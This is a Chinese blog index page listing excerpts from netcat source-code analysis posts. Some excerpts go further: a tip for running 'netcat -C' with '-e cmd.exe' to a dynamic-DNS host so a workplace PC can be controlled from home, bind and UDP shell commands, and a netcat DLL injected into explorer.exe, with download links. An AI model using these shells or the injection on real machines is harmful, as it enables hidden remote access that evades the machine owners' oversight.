nc
sitelist
这个作者很懒,什么都没留下…
展开
-
nc 源代码分析(2),流程分析
nc调试版.rar for windows by chenghao0511步骤1,机器A输入d回车,机器B里面显示d。步骤2,机器A输入d未回车!机器B里面输入ee回车,然后输入ff回车。机器A里面回车。里面显示一些debug()宏函数的信息。vc6下nmake后顺利编译通过。可下载调试版,实验。 if (istty) {原创 2013-04-15 17:55:27 · 2682 阅读 · 0 评论 -
netcat源代码分析,udp模式(1)服务端如何得到客户端的ip地址和端口号?
/* UDP is a speeeeecial case -- we have to do I/O *and* get the calling party's particulars all at once, listen() and accept() don't apply. At least in the BSD universe, however, recvfrom/PEEK原创 2013-05-14 18:16:27 · 2589 阅读 · 0 评论 -
netcat源代码分析,gethostpoop()函数
errno = 0; if (name) poop = (HINF *) Hmalloc (sizeof (HINF)); if (! poop) bail ("gethostpoop fuxored"); strcpy (poop->name, unknown); /* preload it *//* see wzv:workarounds原创 2013-05-10 19:34:31 · 1724 阅读 · 0 评论 -
netcat源代码分析,dolisten()函数中的whoisit
G:\nc\nc114-debug>nc -lp 66in res_initafter recycleafter go: x now , optarg 0 optind 3curport = (null)in dolisten lp = 66in doconnectin doconnect ,listen socket nnetfd = 1864.in dolis原创 2013-05-10 18:31:20 · 1498 阅读 · 0 评论 -
netcat源代码分析,doconnect()函数的作用
在服务端是建立侦听套接字,参数中,最后一个不为0。在客户端是直接和服务端连接,参数中,前两个参数第一个是服务端的ip地址,第二个是要连接的服务端的端口。doconnect() fprintf(stderr,"in doconnect ,listen socket nnetfd = %d.\n",nnetfd); if (o_listen) return (nn原创 2013-05-08 12:20:58 · 1790 阅读 · 0 评论 -
netcat.dll(UDP版),相当于nc -uLp 66,注入到explorer.exe
http://pan.baidu.com/share/link?shareid=487053&uk=453348606https://www.box.com/s/p4fyfe2j66na1xonkd6jnetcat.dll(UDP版) by chenghao05112013-05-20 by chenghao0511#gmail.comdll.dll(netcat.dl原创 2013-05-20 22:18:33 · 1709 阅读 · 0 评论 -
用nc做上传下载工具的先后顺序
用nc做上传下载工具,步骤很重要,一定要先第一步,nc-lp 55 >netcat.exe 然后是第二步,nc 127.0.0.1 55 nc.exe当然下面的方式也可以第一步,nc -lp 55 exe 然后是第二步,nc 127.0.0.1 55 >nc1.exe总之要nc -lp port先原创 2013-04-20 17:30:11 · 1402 阅读 · 0 评论 -
远程线程注入dll的一个例子,netcat.dll
远程dll示例,学习远程线程的例子masm32 v11 免费下载Windows环境下32位汇编语言程序设计中13章的远程注入dll的例子说明HideDll.dll既是nc.dll(改了个名,军刀netcat的动态链接库版),相当于nc -LP 66。loader.exe取自Windows应用程序捆绑核心编程。也可以用Windows环境下32位汇编语言程序设计RemoteTh原创 2013-05-09 13:15:51 · 2320 阅读 · 0 评论 -
netcat源代码分析,doexec.c中的句柄
Result = CreatePipe(&Session->ReadPipeHandle, &ShellStdoutPipe, &SecurityAttributes, 0); if (!Result) { holler("Failed to create shell stdout pipe, error = %s"原创 2013-05-04 21:00:43 · 1676 阅读 · 0 评论 -
update netcat 1.13 to 1.14
解释一下,当应用netcat的传输文件的功能的时候。传输端完成之后不能输入也没有退出,接受端接收完之后能输入,在传输端显示,是不是应该都退出较好呢?改进之后:可以加-C选项,既接受端也可以先运行!直到接收完文件为止。接收端和传输端都退出了。update netcat 1.13 to 1.14modify by chenghao0511##gmai原创 2013-05-03 19:26:56 · 1228 阅读 · 0 评论 -
update netcat 1.14 to 1.15 to support nc -u -lp port -e cmd.exe
更新说明:netcat-1.14之前的版本不支持udp模式下得到一个shell,既同时使用-u选项和-e选项。netcat-1.15下可以,使用如下:1.nc -ulp port -e cmd.exe nc -u ip port2.nc -ulp port nc -u ip port-e cmd.exenc115.rar by chenghao原创 2013-05-11 13:34:47 · 2114 阅读 · 0 评论 -
update netcat 1.12 to 1.13
update netcat 1.12 to 1.13why?modify by 2013/04/30netcat -C ip port same as netcat -L -p porthow to update:- while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuvw:z")) != E原创 2013-05-01 08:34:27 · 1418 阅读 · 0 评论 -
netcat -C选项的好处
可以有的应用,netcat -C xxx.f3322.org 55 -e cmd.exe。比如你单位上可以用上面的简单的命令作为一个远控的服务端。而把你家里的无线路由器的ip地址放到域名里xxx.f3322.org!这样你就可以在家里远控单位上的机器了。当然要映射端口55到你家里的机器的55号端口。这里可以是内网的机器。而不用用windows的计划服务或linux的定时原创 2013-05-01 17:18:02 · 1779 阅读 · 0 评论 -
nc的一个bug,nc ip port -e cmd.exe 命令后ctrl+c后不会关闭连接[已解决]
nc112.rar by chenghao0511#gmail.com现象是nc ip port -e cmd.exe一端的cmd.exe没有销毁。nc -lp port的一端nc输入没有反应。需要ctrl+c结束。doexec.c里面的一段:BOOLdoexec( SOCKET ClientSocket原创 2013-04-20 13:13:15 · 3592 阅读 · 0 评论 -
netcat源代码分析(4)doexec.c文件中的SessionWriteShellThreadFn ()函数
// **********************************************************************// SessionWriteShellThreadFn//// The write thread procedure. Reads from socket, writes to pipe connected// to shell pro原创 2013-04-22 23:15:53 · 1507 阅读 · 0 评论 -
nc 源代码分析(1)【nc用作聊天工具】
客户端:nc ip portread stdin write fd服务端: nc -l -p portread fd write stdout客户端和服务端都是用的nc.exe都要连接既doconnect然后得到一个句柄netfd,所不同的是服务端和客户端在执行readwrite的时候有所区别!read fd write stdout/* m原创 2013-04-14 18:40:26 · 4928 阅读 · 1 评论 -
netcat源代码分析,doexec ()函数和readwrite ()函数的关系
#ifdef GAPING_SECURITY_HOLE if (pr00gie) /* -e given? */ doexec (netfd);#ifdef WIN32 if (!pr00gie) // doexec does the read/write for win32#endif#endif /* GAPING_原创 2013-04-22 23:08:48 · 1777 阅读 · 0 评论